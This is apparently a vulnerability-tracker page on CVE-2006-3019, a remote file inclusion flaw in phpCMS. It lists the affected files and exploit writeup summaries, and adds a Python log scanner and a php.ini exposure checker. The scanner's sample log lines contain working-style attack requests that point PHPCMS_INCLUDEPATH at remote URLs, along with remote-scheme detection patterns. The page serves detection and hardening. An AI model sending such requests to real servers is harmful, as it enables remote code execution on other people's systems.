CVE-2006-3019

phpCMS 1.2.1pl2 - Remote Code Execution via PHPCMS_INCLUDEPATH Parameter

Title source: llm

Exploitation Summary

EIP tracks 10 public exploits for CVE-2006-3019. All ten are Exploit-DB text writeups (EDB-ID 29343 through 29352) published by Federico Fazzi; none of them ships runnable exploit code.

AI-analyzed exploit summary: The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Description

Multiple PHP remote file inclusion vulnerabilities in phpCMS 1.2.1pl2 allow remote attackers to execute arbitrary PHP code via a URL in the PHPCMS_INCLUDEPATH parameter to any of the following ten files (eight under parser/include/, two elsewhere under parser/):

(1) parser/include/class.parser_phpcms.php
(2) parser/include/class.session_phpcms.php
(3) parser/include/class.edit_phpcms.php
(4) parser/include/class.http_indexer_phpcms.php
(5) parser/include/class.cache_phpcms.php
(6) parser/include/class.search_phpcms.php
(7) parser/include/class.lib_indexer_universal_phpcms.php
(8) parser/include/class.layout_phpcms.php
(9) parser/plugs/counter.php
(10) parser/parser.php

NOTE: the class.cache_phpcms.php vector was also reported to affect 1.1.7.
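Detection logic for the vector above, added here as an editor's example; it is not taken from the page's exploit writeups or from phpCMS itself. It parses constructed combined-format web-server log lines (documentation IP ranges, not real traffic) and flags any request whose PHPCMS_INCLUDEPATH query value, after a second round of URL decoding to catch double encoding, starts with a remote or stream-wrapper scheme. Requests against one of the ten files named in the description are marked confirmed-vector; the same parameter on any other path is marked suspicious. The log regex, the scheme list and the sample lines are the example's own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The ten include points named in the CVE-2006-3019 description, relative to the phpCMS root.
AFFECTED_FILES = (
    "parser/include/class.parser_phpcms.php",
    "parser/include/class.session_phpcms.php",
    "parser/include/class.edit_phpcms.php",
    "parser/include/class.http_indexer_phpcms.php",
    "parser/include/class.cache_phpcms.php",
    "parser/include/class.search_phpcms.php",
    "parser/include/class.lib_indexer_universal_phpcms.php",
    "parser/include/class.layout_phpcms.php",
    "parser/plugs/counter.php",
    "parser/parser.php",
)
PARAM = "PHPCMS_INCLUDEPATH"
# Prefixes that make PHP's include() read from a remote or attacker-supplied source (assumed list).
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Apache/nginx "combined" log format (constructed regex; only the fields used below are captured).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def decode_value(value):
    """parse_qs already decoded once; decode again so http%253A%252F%252F... is seen as http://."""
    return unquote(value).strip().lower()


def classify_request(target):
    """Inspect one request-target. Returns None for benign requests, else a dict describing the RFI attempt."""
    parts = urlsplit(target)
    vector = next((f for f in AFFECTED_FILES
                   if parts.path.endswith("/" + f) or parts.path == "/" + f), None)
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        # PHP variable names are case-sensitive; match loosely anyway so scanner probes are not missed.
        if key.lower() != PARAM.lower():
            continue
        for raw in values:
            value = decode_value(raw)
            if value.startswith(REMOTE_PREFIXES):
                return {
                    "path": parts.path,
                    "include_path": value,
                    # A named vector file is a confirmed CVE-2006-3019 attempt; any other path still merits review.
                    "severity": "confirmed-vector" if vector else "suspicious",
                }
    return None


def scan_log(lines):
    """Run classify_request over raw combined-format log lines; returns one finding per matching request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m.group("target"))
        if hit:
            hit.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
            findings.append(hit)
    return findings


# Constructed sample log lines (not real traffic); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Jun/2006:10:01:02 +0000] "GET /phpcms/parser/parser.php?file=index.html HTTP/1.1" 200 1842 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Jun/2006:10:02:10 +0000] "GET /phpcms/parser/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=http://203.0.113.5/inc.txt HTTP/1.1" 200 512 "-" "curl/7.15"',
    '203.0.113.5 - - [15/Jun/2006:10:02:11 +0000] "GET /phpcms/parser/plugs/counter.php?PHPCMS_INCLUDEPATH=http%253A%252F%252F203.0.113.5%252Finc.txt HTTP/1.1" 200 512 "-" "curl/7.15"',
    '203.0.113.9 - - [15/Jun/2006:10:03:00 +0000] "GET /phpcms/index.php?PHPCMS_INCLUDEPATH=ftp://203.0.113.9/x HTTP/1.1" 404 210 "-" "-"',
    '198.51.100.8 - - [15/Jun/2006:10:04:00 +0000] "GET /phpcms/parser/parser.php?PHPCMS_INCLUDEPATH=/var/www/phpcms/parser HTTP/1.1" 200 1842 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['severity']} {f['path']} -> {f['include_path']} (HTTP {f['status']})")
```

The last sample line, a local filesystem path in the same parameter, is deliberately not flagged: this rule targets the remote inclusion the CVE describes, and local values would need a separate traversal rule. A 404 on a suspicious request (fourth line) is still reported, since the attacker learns from it which paths exist.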

Exploits (10)

exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29344

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Remote file inclusion must be enabled on the target server
devstral-2 · analyzed Feb 16, 2026
exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29343

The code describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It highlights the lack of input sanitization, allowing attackers to include arbitrary remote files via the PHPCMS_INCLUDEPATH parameter.

Classification
Writeup 80%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Access to the vulnerable endpoint · Ability to host a malicious file on a remote server
devstral-2 · analyzed Feb 16, 2026
exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29346

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP remote file inclusion enabled on the server
devstral-2 · analyzed Feb 16, 2026
exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29350

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP remote file inclusion configuration enabled
devstral-2 · analyzed Feb 16, 2026
exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29345

This is a vulnerability writeup describing a remote file inclusion (RFI) vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. The issue arises due to insufficient sanitization of user-supplied data in the 'PHPCMS_INCLUDEPATH' parameter, allowing remote command execution via malicious URL inclusion.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP remote file inclusion enabled on the server
devstral-2 · analyzed Feb 16, 2026
exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29351

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP configuration allowing remote file inclusion
devstral-2 · analyzed Feb 16, 2026
exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29352

The code describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2 due to insufficient sanitization of user-supplied data. An attacker can exploit this by manipulating the PHPCMS_INCLUDEPATH parameter to include arbitrary remote files.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · Ability to host a malicious file on a remote server
devstral-2 · analyzed Feb 16, 2026
exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29348

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP configuration allowing remote file inclusion
devstral-2 · analyzed Feb 16, 2026
exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29347

The code describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2 due to insufficient sanitization of user-supplied data. The exploit allows an attacker to include arbitrary remote files via the PHPCMS_INCLUDEPATH parameter.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · Remote file hosting for malicious payload
devstral-2 · analyzed Feb 16, 2026
exploitdb WRITEUP VERIFIED
by Federico Fazzi · text · webapps · php
https://www.exploit-db.com/exploits/29349

The provided text describes a remote file inclusion vulnerability in phpCMS versions 1.1.7 and 1.2.1pl2. It outlines the vulnerability's cause and potential impact but does not include functional exploit code.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Theoretical
Target: phpCMS 1.1.7, 1.2.1pl2
No auth needed
Prerequisites: Network access to the target application · PHP remote file inclusion settings enabled
devstral-2 · analyzed Feb 16, 2026
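The prerequisite every analysis above repeats, "PHP remote file inclusion enabled on the server", can be verified from the server side rather than by probing. The following Python is an added example, not part of the page, of the writeups, or of phpCMS; it parses php.ini text or the rows printed by php -i and reports which settings together let a URL in PHPCMS_INCLUDEPATH reach include(). The dependence on register_globals is the editor's assumption about how a query parameter of that name becomes a PHP variable, not something the page states; the version cut-off reflects that allow_url_include was introduced in PHP 5.2.0 and allow_url_fopen alone governed URL includes before that. The ini fragments are constructed.

```python
import re

# Boolean spellings PHP's ini parser treats as true.
_TRUE = {"1", "on", "yes", "true"}


def parse_php_ini(text):
    """Parse php.ini lines ("key = value") or `php -i` rows ("key => local => master") into a dict."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()          # drop comments and blank lines
        if not line or line.startswith("["):
            continue
        if "=>" in line:
            fields = [f.strip() for f in line.split("=>")]
            settings[fields[0].lower()] = fields[1]   # keep the local (effective) value
        elif "=" in line:
            key, _, value = line.partition("=")
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(settings, key):
    """True if the directive is present and set to a truthy PHP boolean."""
    return settings.get(key, "").strip().lower() in _TRUE


def version_tuple(version):
    """'5.2.17-1ubuntu' -> (5, 2, 17)."""
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3])


def rfi_exposure(settings, php_version):
    """List the conditions that together let a URL in PHPCMS_INCLUDEPATH reach include(); empty means hardened."""
    reasons = []
    # Editor's assumption: phpCMS read PHPCMS_INCLUDEPATH as a global, so the request parameter
    # only becomes $PHPCMS_INCLUDEPATH when register_globals is On (the directive was removed in PHP 5.4).
    if is_on(settings, "register_globals"):
        reasons.append("register_globals=On: request parameters become globals such as $PHPCMS_INCLUDEPATH")
    if version_tuple(php_version) < (5, 2, 0):
        # Before PHP 5.2.0 there was no allow_url_include; allow_url_fopen also governed include() of URLs.
        if is_on(settings, "allow_url_fopen"):
            reasons.append("allow_url_fopen=On on PHP < 5.2.0: include() accepts http:// and ftp:// sources")
    elif is_on(settings, "allow_url_include"):
        if is_on(settings, "allow_url_fopen"):
            reasons.append("allow_url_include=On: include() accepts remote URLs")
        else:
            reasons.append("allow_url_include=On: http:// is blocked by allow_url_fopen=Off, "
                           "but data: and php://input wrappers still load")
    return reasons


# Constructed ini fragments, not taken from any real server.
WEAK_INI = """
; 2006-era PHP 4 configuration as many hosts ran it
register_globals = On
allow_url_fopen = On
"""

HARDENED_INI = """
register_globals = Off
allow_url_fopen = On      ; still needed by legitimate fopen()/file_get_contents() on URLs
allow_url_include = Off   ; the directive that matters for include()/require()
"""

# Constructed `php -i` rows for a PHP 5.3 host that re-enabled the dangerous directives.
PHP_I_ROWS = """
register_globals => On => On
allow_url_fopen => On => On
allow_url_include => On => On
"""

if __name__ == "__main__":
    cases = (("weak", WEAK_INI, "4.4.2"), ("hardened", HARDENED_INI, "5.2.17"), ("php -i", PHP_I_ROWS, "5.3.29"))
    for label, text, ver in cases:
        found = rfi_exposure(parse_php_ini(text), ver)
        print(f"{label} (PHP {ver}): {'EXPOSED' if found else 'HARDENED'}")
        for reason in found:
            print("  -", reason)
```

The hardened fragment keeps allow_url_fopen on deliberately: turning it off breaks ordinary URL reads in unrelated code, while allow_url_include=Off alone closes the include() path this CVE needs. On a PHP 4 host there is no such directive, which is why the check treats allow_url_fopen itself as the exposure there.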

References (17)

Core References
Vendor Advisory third-party-advisory x_refsource_secunia
http://secunia.com/advisories/20573
Third Party Advisory third-party-advisory x_refsource_sreason
http://securityreason.com/securityalert/1106
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26394
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26396
Third Party Advisory, VDB Entry vdb-entry x_refsource_xf
https://exchange.xforce.ibmcloud.com/vulnerabilities/27067
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26395
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26397
Vendor Advisory vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2006/2302
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/455302/100/0/threaded
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/436893/100/0/threaded
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26391
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26390
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/21768
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26389
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26392
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26388
Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb
http://www.osvdb.org/26393

Scores

EPSS 0.0774 (7.74% estimated probability of exploitation activity in the next 30 days)
EPSS Percentile 93.9%

Details

CWE
CWE-94
Status published
Products (1)
phpcms/phpcms 1.2.1_p12
Published Jun 15, 2006
Tracked Since Feb 18, 2026